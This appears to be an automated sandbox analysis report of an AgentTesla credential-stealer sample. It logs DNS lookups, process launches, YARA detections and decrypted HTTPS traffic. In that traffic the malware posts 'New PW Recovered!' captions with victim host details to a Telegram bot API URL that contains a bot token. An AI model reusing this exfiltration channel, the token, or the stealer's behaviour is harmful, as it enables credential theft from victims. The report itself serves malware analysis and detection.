                                                                                Mar 20, 2023 18:33:23.202795029 CET192.168.2.38.8.8.80x7ad3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.229949951 CET192.168.2.38.8.8.80xf168Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:24.733335972 CET192.168.2.38.8.8.80x2cfeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.633577108 CET8.8.8.8192.168.2.30x19fcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.665841103 CET8.8.8.8192.168.2.30xa091No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:36.289082050 CET8.8.8.8192.168.2.30x71bcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.586179972 CET8.8.8.8192.168.2.30x38bcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.627496004 CET8.8.8.8192.168.2.30xc297No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.222448111 CET8.8.8.8192.168.2.30x7ad3No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:23.249663115 CET8.8.8.8192.168.2.30xf168No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:33:24.752517939 CET8.8.8.8192.168.2.30x2cfeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • api.ipify.org
                                                                                • api.telegram.org

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.349699173.231.16.76443C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:31:28 UTC0OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:31:28 UTC0INHTTP/1.1 200 OK
                                                                                Content-Length: 14
                                                                                Content-Type: text/plain
                                                                                Date: Mon, 20 Mar 2023 17:31:28 GMT
                                                                                Vary: Origin
                                                                                Connection: close
                                                                                2023-03-20 17:31:28 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                Data Ascii: 102.129.143.78


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.349701149.154.167.220443C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:31:36 UTC0OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5f
                                                                                Host: api.telegram.org
                                                                                Content-Length: 972
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:31:36 UTC0INHTTP/1.1 100 Continue
                                                                                2023-03-20 17:31:36 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 63 37 63 33 63 62 64 65 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 63 37 63 33 63 62 64 65 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 34 3a 33 30 3a 32 31 0a 55 73 65 72
                                                                                Data Ascii: -----------------------------8db29c7c3cbde5fContent-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29c7c3cbde5fContent-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 04:30:21User
                                                                                2023-03-20 17:31:36 UTC1INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Mon, 20 Mar 2023 17:31:36 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 727
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":280,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333496,"document":{"file_name":"user-494126 2023-03-21 04-30-21.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGGQYmHhSzFVPJoEN7Pq9q7HeKDV5AAImDwACJVnIUKPKGyrDEZXULwQ","file_unique_id":"AgADJg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 04:30:21\nUser Name: user/494126\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.349702173.231.16.76443C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:32:36 UTC2OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:32:37 UTC2INHTTP/1.1 200 OK
                                                                                Content-Length: 14
                                                                                Content-Type: text/plain
                                                                                Date: Mon, 20 Mar 2023 17:32:37 GMT
                                                                                Vary: Origin
                                                                                Connection: close
                                                                                2023-03-20 17:32:37 UTC2INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                Data Ascii: 102.129.143.78


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.349714173.231.16.76443C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:33:23 UTC2OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:33:24 UTC3INHTTP/1.1 200 OK
                                                                                Content-Length: 14
                                                                                Content-Type: text/plain
                                                                                Date: Mon, 20 Mar 2023 17:33:24 GMT
                                                                                Vary: Origin
                                                                                Connection: close
                                                                                2023-03-20 17:33:24 UTC3INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                Data Ascii: 102.129.143.78


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.349715149.154.167.220443C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-03-20 17:33:24 UTC3OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8db297197376642
                                                                                Host: api.telegram.org
                                                                                Content-Length: 972
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2023-03-20 17:33:24 UTC3INHTTP/1.1 100 Continue
                                                                                2023-03-20 17:33:24 UTC3OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 39 37 33 37 36 36 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 37 31 39 37 33 37 36 36 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 31 38 3a 33 33 3a 32 34 0a 55 73 65 72
                                                                                Data Ascii: -----------------------------8db297197376642Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db297197376642Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 18:33:24User
                                                                                2023-03-20 17:33:24 UTC4INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Mon, 20 Mar 2023 17:33:24 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 727
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":282,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679333604,"document":{"file_name":"user-494126 2023-03-20 18-33-24.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBGmQYmORISPAYzBYw3QRGJkcrVYRgAAIqDwACJVnIUOHVmeKO6YghLwQ","file_unique_id":"AgADKg8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 18:33:24\nUser Name: user/494126\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:18:30:47
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x3d0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:1
                                                                                Start time:18:30:57
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                Imagebase:0x1350000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high

                                                                                General

                                                                                Target ID:2
                                                                                Start time:18:30:57
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff745070000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Target ID:12
                                                                                Start time:18:31:25
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x50000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:13
                                                                                Start time:18:31:25
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0xb0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:14
                                                                                Start time:18:31:26
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0x3d0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:15
                                                                                Start time:18:31:26
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                Imagebase:0xd60000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:16
                                                                                Start time:18:31:33
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                                                                Imagebase:0xcf0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 53%, Virustotal, Browse
                                                                                • Detection: 33%, ReversingLabs
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:17
                                                                                Start time:18:31:42
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                Imagebase:0x7ff745070000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 33%, ReversingLabs
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:18
                                                                                Start time:18:31:53
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                                                                Imagebase:0xe00000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:low

                                                                                General

                                                                                Target ID:19
                                                                                Start time:18:31:55
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                Imagebase:0x1350000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:high

                                                                                General

                                                                                Target ID:20
                                                                                Start time:18:31:55
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff745070000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Target ID:21
                                                                                Start time:18:32:02
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                Imagebase:0x9f0000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Target ID:24
                                                                                Start time:18:32:28
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                Imagebase:0x1350000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Target ID:25
                                                                                Start time:18:32:28
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Imagebase:0x130000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Target ID:26
                                                                                Start time:18:32:28
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff745070000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                General

                                                                                Target ID:27
                                                                                Start time:18:32:30
                                                                                Start date:20/03/2023
                                                                                Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                Imagebase:0x950000
                                                                                File size:1863168 bytes
                                                                                MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                General

                                                                                Target ID:28
                                                                                Start time:18:32:50
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                Imagebase:0x1350000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:.Net C# or VB.NET

                                                                                General

                                                                                Target ID:29
                                                                                Start time:18:32:50
                                                                                Start date:20/03/2023
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff68f300000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.4%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:54
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 12383 5431503 12384 54317fb 12383->12384 12385 543132d 12384->12385 12387 5434693 12384->12387 12388 54337f5 12387->12388 12388->12387 12389 54335c3 12388->12389 12391 5433418 12388->12391 12389->12385 12392 5433463 ReadProcessMemory 12391->12392 12394 54334a7 12392->12394 12394->12388 12395 2661e80 12396 2661e84 12395->12396 12397 2661e9d 12396->12397 12399 26620ba 12396->12399 12406 26622b6 12399->12406 12410 2662318 12399->12410 12415 266229c 12399->12415 12419 2662191 12399->12419 12423 26621a0 12399->12423 12400 26620c3 12400->12397 12407 26622c9 12406->12407 12408 26622db 12406->12408 12427 2662598 12407->12427 12411 266231e 12410->12411 12440 2662860 12411->12440 12444 2662851 12411->12444 12412 2662330 12412->12400 12416 266224f 12415->12416 12416->12415 12417 26622db 12416->12417 12418 2662598 2 API calls 12416->12418 12418->12417 12420 26621a0 12419->12420 12421 26622db 12420->12421 12422 2662598 2 API calls 12420->12422 12422->12421 12424 26621a4 12423->12424 12425 26622db 12424->12425 12426 2662598 2 API calls 12424->12426 12426->12425 12428 26625a8 12427->12428 12432 26625e8 12428->12432 12436 26625f8 12428->12436 12429 26625c6 12429->12408 12433 26625f8 12432->12433 12434 266265c RtlEncodePointer 12433->12434 12435 2662685 12433->12435 12434->12435 12435->12429 12437 26625fc 12436->12437 12438 266265c RtlEncodePointer 12437->12438 12439 2662685 12437->12439 12438->12439 12439->12429 12441 266286e 12440->12441 12448 2662899 12441->12448 12442 266287e 12442->12412 12445 2662860 12444->12445 12447 2662899 RtlEncodePointer 12445->12447 12446 266287e 12446->12412 12447->12446 12449 26628e1 12448->12449 12450 2662907 RtlEncodePointer 12449->12450 12451 2662930 12449->12451 12450->12451 12451->12442

                                                                                  Executed Functions

                                                                                  Function 054360D0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
